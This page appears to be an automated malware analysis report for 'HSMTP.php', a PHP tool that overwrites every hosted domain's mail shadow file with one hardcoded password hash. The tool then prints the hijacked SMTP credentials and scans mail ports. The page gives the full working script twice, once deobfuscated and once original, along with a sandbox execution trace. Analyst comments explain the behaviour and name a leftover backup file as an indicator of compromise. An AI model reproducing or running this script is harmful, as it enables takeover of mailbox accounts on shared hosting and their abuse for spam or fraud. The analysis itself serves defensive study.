PHP Malware Analysis

HSMTP.php

md5: 09784ff5aec57caa698ca8792e2fe572



Deobfuscated PHP code

<?php

//Bksmile **(RooTTN)**
// Analyst note: this script walks every directory under the hosting account's
// ~/etc/, replaces each domain's mail "shadow" file so that every mailbox
// carries the same attacker-chosen password hash, prints the resulting
// SMTP credential list, and then probes the domain for open mail ports.
// The execution trace on this page shows glob() returning [] in the sandbox,
// so the loop body below never ran there; the comments describe the code
// as written, not observed behaviour.
// Lift every runtime limit so a long list of domains/accounts cannot cut the run short.
set_time_limit(0);
ini_set('max_execution_time', 0);
ini_set('memory_limit', -1);
// port to scan (SMTP, submission, SMTPS, POP3, POP3S, IMAP, IMAPS)
$ports = array(25, 587, 465, 110, 995, 143, 993);
$primary_port = '25'; // assigned but never read anywhere in the script
// current user: owner of the running script (the trace shows 'osboxes')
$user = get_current_user();
// Smtp password: the cleartext value every mailbox will accept after the rewrite
$password = 'kingslake';
// crypt with a "$6$" prefix = SHA-512 crypt, fixed salt "roottn"; the trace
// shows the resulting hash, which is constant for every run of this sample.
$pwd = crypt($password, '$6$roottn$');
// host name
$t = $_SERVER['SERVER_NAME'];
// strip a leading "www."; $t is never used after this line
$t = @str_replace("www.", "", $t);
// Every directory under ~/etc/ is treated as a hosted domain. The path shape
// ~/etc/<domain>/shadow matches cPanel's per-domain mail account store —
// presumably the intended target; not confirmable from the sample alone.
$dirs = glob('/home/' . $user . '/etc/*', GLOB_ONLYDIR);
foreach ($dirs as $dir) {
    $ex = explode("/", $dir);
    $site = $ex[count($ex) - 1]; // last path component = domain name
    // read the domain's existing mail shadow file; "@" hides any read failure
    @($passwd = file_get_contents('/home/' . $user . '/etc/' . $site . '/shadow'));
    // Split on CRLF. If the file uses plain LF line endings, explode() yields a
    // single element holding the whole file, so only the first account name is
    // carried into the rewrite below and the remaining accounts are dropped.
    $ex = explode("\r\n", $passwd);
    // "backup": a hard link to the original inode, so the old content survives
    // the unlink below as shadow.roottn.bak — that filename is a useful
    // on-disk indicator for this sample.
    @link('/home/' . $user . '/etc/' . $site . '/shadow', '/home/' . $user . '/etc/' . $site . '/shadow.roottn.bak');
    // remove the real shadow file; it is rebuilt line by line in the loop below
    @unlink('/home/' . $user . '/etc/' . $site . '/shadow');
    // Re-create shadow from scratch with one line per account, all sharing $pwd.
    // The loop variable reuses the array's own name; this works only because a
    // by-value foreach iterates over a copy of the array.
    foreach ($ex as $ex) {
        $ex = explode(':', $ex);
        $e = $ex[0]; // account name = first colon-separated field
        if ($e) {
            // Append "name:<hash>:16249:::::" in shadow(5) layout; 16249 is the
            // last-changed field (days since the epoch, i.e. mid-2014).
            $b = fopen('/home/' . $user . '/etc/' . $site . '/shadow', 'ab');
            fwrite($b, $e . ':' . $pwd . ':16249:::::' . "\r\n");
            fclose($b);
            // Emits a ready-made credential line: domain|25|user@domain|cleartext password.
            echo '<span style=\'color:#0000ff;\'>' . $site . '|25|' . $e . '@' . $site . '|' . $password . '</span><br>';
            "</center>"; // bare string expression, has no effect
        }
    }
    // port scan: try each mail port on the domain with a 2 s timeout and report the open ones
    foreach ($ports as $port) {
        $connection = @fsockopen($site, $port, $errno, $errstr, 2);
        if (is_resource($connection)) {
            // $host is never assigned in this script, so the output starts with ":<port>"
            echo '<span>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</span>' . ", ";
            fclose($connection);
        }
    }
    echo "<br/>";
}

Execution traces

data/traces/09784ff5aec57caa698ca8792e2fe572_trace-1676251780.5892.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:30:06.487013]
1	0	1	0.000161	393512
1	3	0	0.000280	406744	{main}	1		/var/www/html/uploads/HSMTP.php	0	0
2	4	0	0.000297	406744	set_time_limit	0		/var/www/html/uploads/HSMTP.php	3	1	0
2	4	1	0.000314	406808
2	4	R			FALSE
2	5	0	0.000328	406776	ini_set	0		/var/www/html/uploads/HSMTP.php	4	2	'max_execution_time'	0
2	5	1	0.000345	406816
2	5	R			'0'
2	6	0	0.000358	406744	ini_set	0		/var/www/html/uploads/HSMTP.php	5	2	'memory_limit'	-1
2	6	1	0.000373	406880
2	6	R			'128M'
1		A						/var/www/html/uploads/HSMTP.php	7	$ports = [0 => 25, 1 => 587, 2 => 465, 3 => 110, 4 => 995, 5 => 143, 6 => 993]
1		A						/var/www/html/uploads/HSMTP.php	8	$primary_port = '25'
2	7	0	0.000415	406776	get_current_user	0		/var/www/html/uploads/HSMTP.php	10	0
2	7	1	0.000450	406816
2	7	R			'osboxes'
1		A						/var/www/html/uploads/HSMTP.php	10	$user = 'osboxes'
1		A						/var/www/html/uploads/HSMTP.php	12	$password = 'kingslake'
2	8	0	0.000487	406816	crypt	0		/var/www/html/uploads/HSMTP.php	14	2	'kingslake'	'$6$roottn$'
2	8	1	0.002606	407008
2	8	R			'$6$roottn$f4gq6BO55O7XORbtphIDJ1/IobUGAnthJXdBaE.yIlSydXGLc.E11K/Aa0Qeu4YQdCplfe3VyOdqIJFrt2iUT/'
1		A						/var/www/html/uploads/HSMTP.php	14	$pwd = '$6$roottn$f4gq6BO55O7XORbtphIDJ1/IobUGAnthJXdBaE.yIlSydXGLc.E11K/Aa0Qeu4YQdCplfe3VyOdqIJFrt2iUT/'
1		A						/var/www/html/uploads/HSMTP.php	16	$t = 'localhost'
2	9	0	0.002661	406944	str_replace	0		/var/www/html/uploads/HSMTP.php	18	3	'www.'	''	'localhost'
2	9	1	0.002677	407040
2	9	R			'localhost'
1		A						/var/www/html/uploads/HSMTP.php	18	$t = 'localhost'
2	10	0	0.002703	406992	glob	0		/var/www/html/uploads/HSMTP.php	20	2	'/home/osboxes/etc/*'	8192
2	10	1	0.002723	407112
2	10	R			[]
1		A						/var/www/html/uploads/HSMTP.php	20	$dirs = []
1	3	1	0.002749	407000
			0.002778	315136
TRACE END   [2023-02-12 23:30:06.489659]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
//Bksmile **(RooTTN)**
// Analyst note: original (pre-reformat) sample. It rewrites each domain's mail
// shadow file under ~/etc/ so every mailbox shares one known password, prints
// the credentials, then probes the domain's mail ports. See the deobfuscated
// listing above for a line-by-line description.
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(25, 587, 465, 110, 995, 143 , 993);
$primary_port='25'; // never read
// current user (script owner)
$user=get_current_user();
// Smtp password
$password='kingslake';
// crypt: "$6$" prefix = SHA-512 crypt with fixed salt "roottn"
$pwd = crypt($password,'$6$roottn$');
// host name
 $t = $_SERVER['SERVER_NAME'];
// strip "www."; $t is unused afterwards
 $t = @str_replace("www.","",$t);
 
// each subdirectory of ~/etc/ is treated as a hosted domain
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site =  $ex[count($ex)-1];


 //get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
// split on CRLF; an LF-only file yields a single element
$ex=explode("\r\n",$passwd);
//backup shadow (hard link; shadow.roottn.bak is an on-disk indicator of this sample)
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.roottn.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// rebuild shadow: one line per account, all with the same hash
foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
echo '<span style=\'color:#0000ff;\'>'.$site.'|25|'.$e.'@'.$site.'|'.$password.'</span><br>';  "</center>";
}}
//port scan
foreach ($ports as $port)
{
    $connection = @fsockopen($site, $port, $errno, $errstr, 2);
    if (is_resource($connection))
    {
        // $host is never assigned in this script
        echo '<span>' . $host . ':' . $port . ' ' . '(' . getservbyport($port, 'tcp') . ') is open.</span>' . ", ";
        fclose($connection);
    }
	
}
echo "<br/>";

}

 
 
 
 
 
 
 

?>